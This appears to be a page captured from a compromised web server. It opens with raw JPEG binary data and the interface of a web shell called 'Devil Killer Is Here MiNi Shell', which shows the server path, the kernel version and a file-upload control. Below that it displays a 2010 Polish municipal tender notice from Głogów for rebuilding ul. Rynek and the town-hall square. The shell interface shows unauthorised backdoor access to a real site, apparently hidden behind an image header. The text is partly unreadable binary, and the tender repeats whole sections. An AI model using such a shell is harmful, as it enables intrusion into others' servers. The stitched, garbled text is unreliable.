JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100604/144115-N-2010.html

<p class="kh_header"><b>Głogów: Budowa ulicy Rynek wraz z zagospodarowaniem terenu za budynkiem Ratusza na Starym Mieście w Głogowie w ramach realizacji zadania pn.: Infrastruktura na Starym Mieście w tym m.in.: ul. Rynek, zagospodarowanie terenu za Ratuszem, ul. Długa - droga tymczasowa, droga wewnętrzna ul. Garncarska - ul. Balwierska</b><br>
<b>Numer ogłoszenia: 144115 - 2010; data zamieszczenia: 04.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Rynek wraz z zagospodarowaniem terenu za budynkiem Ratusza na Starym Mieście w Głogowie w ramach realizacji zadania pn.: Infrastruktura na Starym Mieście w tym m.in.: ul. Rynek, zagospodarowanie terenu za Ratuszem, ul. Długa - droga tymczasowa, droga wewnętrzna ul. Garncarska - ul. Balwierska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Charakterystyka
Zakres robót obejmuje:

Branża drogowa:
2.	Dane ogólne
a)	długość projektowana- 147,88 m
b)	szerokość projektowana jezdni- 12,00 m
c)	chodnik jednostronny- szer 3,25 do 3,60 m
d)	odwodnienie ulicy
e)	oświetlenie ulicy
3.	Jezdnia 
a)	Konstrukcja projektowana- 1887,20 m2 (nowa) tj. 1837 m2 jezdni oraz 50,20 m2 linii rozgraniczających
-	Brukowiec z kamienia łamanego  do sortowania (materiał inwestora z rozbiórki) na podsypce cementowo piaskowej 1:4 grubość 5 cm z wypełnieniem spoin 1 -3 miałem bazaltowym oraz 2-3 gotową zaporą fugową do kostki brukowej typu SOPRO,uwaga: zmiana w stosunku do przedmiaru robót poz. 37 przedmiaru robót etapu I, poz. 38 przedmiaru pozostaje bez zmian 
-	Podbudowa tłuczniowa grubość 20 cm
b)	jezdnie do przedłożenia z kostki kamiennej grubość 20cm (odzysk)- 110,50 m2 
c)	jezdnie do przedłożenia z kostki kamiennej grubość 10cm (odzysk)- 22,70 m2

4.	Chodniki
a)	z płyt kwadratowych granitowych płomieniowanych 50x50 cm grubość 7 cm na podsypce cementowo- piaskowej tj. 307,10 m2
b)	z kostki granitowej fakturowanej czarnej (boki łupane, górna powierzchnia obrabiana) grubość 8 cm tj. 271,70 m2 uwaga: zmiana w stosunku do przedmiaru robót poz. 46 przedmiaru robót etapu I
5.	Krawężniki i obrzeża 
a)	Krawężnik kamienny 30x35 rodzaj A na podsypce cementowo- piaskowej ławie betonowej z oporem tj. 314,70m (materiał nowy)
b)	Jak wyżej, lecz materiał z rozbiórki tj. 19,70 m
c)	Obrzeże betonowe 30x8 na podsypce cementowo piaskowej grubość 3 cm
 tj. 13,40 m
6.	Ścieki przykrawężnikowe z kamienia łamanego  do sortowania (materiał inwestora z rozbiórki),  na podsypce cementowo- piaskowej grubość 5 cm
a)	133,40 m2 z materiału nowego
b)	9,8 m2 z materiału z rozbiórki
7.	Oznakowanie pionowe 
a)	słupki do znaków 7szt.
b)	Tarcze znaków19szt. 
c)	Przestawienie znaków 2szt.
d)	Demontaż znaków 7szt. 
8.	Inne roboty
a)	kosze na śmieci K-S8  4szt. 

Plac za budynkiem Ratusza wraz z budową fontanny

Branża drogowa obejmuje: 
1.	utwardzenie placu za budynkiem Ratusza
2.	budowę zjazdu publicznego do miejsc postojowych
3.	budowę chodnika o szerokości min. 2,0 m

Utwardzenie placu obejmuje zakres robót:
-	wymianę gruntów nienośnych tj. 943 m3 ( 60% mechanicznie, 40% ręcznie)
-	forowanie i zagęszczanie nasypów tj. 971 m3 
-	rozebranie nawierzchni z kostki granitowej (materiał do ponownego użytku tj. 457 m2)
-	rozebranie nawierzchni z płyt granitowych grubość 7cm (materiał częściowo do ponownego użycia) tj. 228 m2 
-	rozebranie podbudowy tłuczniowej (materiał do ponownego użycia) tj. 445m2 
-	rozbiórka różnych krawężników tj. 189mb
-	rozbiórka starych murów i ław betonowych tj. 56 m3 
-	wykonanie podbudowy z tłucznia kamiennego miejsc postojowych grubość 20 cm tj. 445 m2 (materiał z rozbiórki)
-	jak wyżej lecz grubość 10 cm tj. 906 m2 (plac + chodnik)
-	jak wyżej lecz grubość 20 cm pod zjazdem tj. 172 m2
-	nawierzchnia z kostki kamiennej regularnej (materiał inwestora z rozbiórki tj. 18 m 2 )
-	nawierzchnia z kostki kamiennej granitowej fakturowanej klasa I gatunek I, grubość 10 cm tj. 912 m 2 (plac za budynkiem Ratusza)
-	jak wyżej lecz chodników i miejsc postojowych tj. 457 m2 
-	ułożenie krawężnika kamiennego 20x35 tj. 4mb


-	Podbudowa tłuczniowa grubość 20 cm
b)	jezdnie do przedłożenia z kostki kamiennej grubość 20cm (odzysk)- 110,50 m2 
c)	jezdnie do przedłożenia z kostki kamiennej grubość 10cm (odzysk)- 22,70 m2
9.	Chodniki
a)	z płyt kwadratowych granitowych 50x50 cm grubość 7 cm na podsypce cementowo- piaskowej tj. 307,10 m2
b)	z kostki granitowej czarnej (boki łupane, górna powierzchnia obrabiana) grubość 10 cm tj. 271,70 m2 
10.	Krawężniki i obrzeża 
a)	Krawężnik kamienny 30x35 rodzaj A na podsypce cementowo- piaskowej ławie betonowej z oporem tj. 314,70m (materiał nowy)
b)	Jak wyżej, lecz materiał z rozbiórki tj. 19,70 m
c)	Obrzeże betonowe 30x8 na podsypce cementowo piaskowej grubość 3 cm
 tj. 13,40 m
11.	Ścieki przykrawężnikowe z kostki kamiennej regularnej, normalnej, klasa I, gatunek I, grubość 20 cm, na podsypce cementowo- piaskowej grubość 5 cm
a)	133,40 m2 z materiału nowego
b)	9,8 m2 z materiału z rozbiórki
12.	Oznakowanie pionowe 
a)	słupki do znaków 7szt.
b)	Tarcze znaków19szt. 
c)	Przestawienie znaków 2szt.
d)	Demontaż znaków 7szt. 
13.	Inne roboty
a)	kosze na śmieci K-S 8 4szt. 

Plac za budynkiem Ratusza wraz z budową fontanny
Branża drogowa obejmuje: 
4.	utwardzenie placu za budynkiem Ratusza
5.	budowę zjazdu publicznego do miejsc postojowych
6.	budowę chodnika o szerokości min. 2,0 m

Utwardzenie placu obejmuje zakres robót:
-	wymianę gruntów nienośnych tj. 943 m3 ( 60% mechanicznie, 40% ręcznie)
-	forowanie i zagęszczanie nasypów tj. 971 m3 
-	rozebranie nawierzchni z kostki granitowej (materiał do ponownego użytku tj. 457 m2)
-	rozebranie nawierzchni z płyt granitowych grubość 7cm (materiał częściowo do ponownego użycia) tj. 228 m2 
-	rozebranie podbudowy tłuczniowej (materiał do ponownego użycia) tj. 445m2 
-	rozbiórka różnych krawężników tj. 189mb
-	rozbiórka starych murów i ław betonowych tj. 56 m3 
-	wykonanie podbudowy z tłucznia kamiennego miejsc postojowych grubość 20 cm tj. 445 m2 (materiał z rozbiórki)
-	jak wyżej lecz grubość 10 cm tj. 906 m2 (plac + chodnik)
-	jak wyżej lecz grubość 20 cm pod zjazdem tj. 172 m2
-	nawierzchnia z kostki kamiennej regularnej (materiał inwestora z rozbiórki tj. 18 m 2 )
-	nawierzchnia z kostki kamiennej nieregularnej klasa I gatunek I, grubość 10 cm tj. 912 m 2 (plac za budynkiem Ratusza)
-	ja wyżej lecz chodników i miejsc postojowych tj. 457 m2 
-	ułożenie krawężnika kamiennego 20x35 tj. 4mb
-	nawierzchnia chodnika z płyt granitowych 90x90x7 tj. 159 m2 +46=205m 2

Inne roboty: 
-	kosze na śmieci K-S 8 tj. 8szt.
-	Ustawienie ławek 8 szt.
-	Ustawienie stojaków na rowery 2 szt.
-	Przestawienie tymczasowego ogrodzenia przy ruinach Budynku Teatru 30 mb

 Branża elektryczna
      Oświetlenie terenu:
1.	Budowa linii kablowej n n 0,4 kV YAKXs 4 x 35 mm                     -    188 mb
2.	Montaż fundamentów prefabrykowanych B ( F 100 )                      -        6 szt.
3.	Montaż latarni D6a 2-5 i 3-5                                                             -         6 szt.    
4.	Montaż opraw ( 05 ) Dawid                                                         -         6  szt.                                     
5.	Montaż instalacji uziemiającej - bednarka FeZn 30 x 4  mm          -       30 mb
6.	Montaż lamp sodowych NAV T 100W SUPER                              -         6 szt.
7.	Montaż rur osłonowych DVK, SRS i A 110 PS                              -        66 mb.

Zasilanie fontann:
1.   Budowa linii zasilającej n n o,4 kv YKXS 5 x 16 mm                      -     35 mb
2    Budowa obwodów zasilających pompy, dysze, oprawy oświetl.      -   940 mb
3.   Montaż opraw oświetleniowych                                                       -      19 szt.
4.   Montaż rozdzielnicy wraz z osprzętem modułowym                        -       1 kpl.

Przebudowa linii teletechnicznej:
1.    Budowa studni kanalizacji teletechn. SK - 1                                     -      1 szt.
2.    Budowa kanalizacji kablowej - teletechn.   RPCW 110/5,0              -    18 mb 

Branża sanitarna
1. Kanalizacja deszczowa - do wykonania odwodnienia ulicy poprzez zabudowanie 8 szt. wpustów ulicznych z osadnikiem, syfonem i koszem, odprowadzenie wód z przykanalików rurami PVC O 160mm L= 5,5mb oraz O 200mm o łącznej długości 86,5mb z włączeniem ich do istniejącej kanalizacji ogólnospławnej. 
2. Do wykonania budowa 2 szt. fontann z instalacjami technologicznymi oraz komorami technicznymi, doprowadzenie wody z pomiarem z budynku Ratusza, odprowadzenia wód
 z tych fontann do kanalizacji istniejącej. W komorach technologicznych przewidziano instalacje technologiczne uzdatniające i powodujące pracę fontann - pompy. 
Szczegółowy zakres wykonania robót zawiera dokumentacja projektowa, przedmiary robót i specyfikacje techniczne wykonania i odbioru robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Budowa ulicy Rynek wraz z zagospodarowaniem terenu za budynkiem Ratusza na Starym Mieście w Głogowie w ramach realizacji zadania pn.: Infrastruktura na Starym Mieście w tym m.in.: ul. Rynek, zagospodarowanie terenu za Ratuszem, ul. Długa - droga tymczasowa, droga wewnętrzna ul. Garncarska - ul. Balwierska
Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 30.000,00zł.
słownie: trzydzieści tysięcy złotych 00/100.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
2)	Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania i w tym względzie są przedsiębiorcami w rozumieniu art. 2 i art. 4 ust. 1 i 2, prowadzącymi działalność gospodarczą zgodnie z art. 14 ust. 1 ustawy z dnia 02 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2007 r. Nr 155, poz. 1095 ze zmianami );</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
2)	Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
a)  wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed wszczęciem postępowania, 
a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane w zakresie niezbędnym 
do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. jednej roboty polegającej na  budowie/przebudowie drogi 
o nawierzchni z kostki kamiennej o powierzchni nie mniejszej jak 1.000m2 wraz 
z kanalizacją deszczową i oświetleniem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
2)	Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
3)	dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
2)	Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
a)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.: kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia, kierowania robotami budowlanym 
w specjalności instalacyjnej w zakresie sieci kanalizacyjnych w zakresie niezbędnym do wykonania zamówienia, kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych 
w zakresie niezbędnym do wykonania zamówienia, kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie niezbędnym do wykonania zamówienia, oraz osobą posiadającą zaświadczenie w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach
 i archeologicznych prac wykopaliskowych lub 2 letnią praktykę zawodową przy zabytkach nieruchomych (należy dołączyć oświadczenie tej osoby)
b)	kadra kierowania budową musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
2)	Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.
a)	dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum 500.000,00 zł, 
b)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
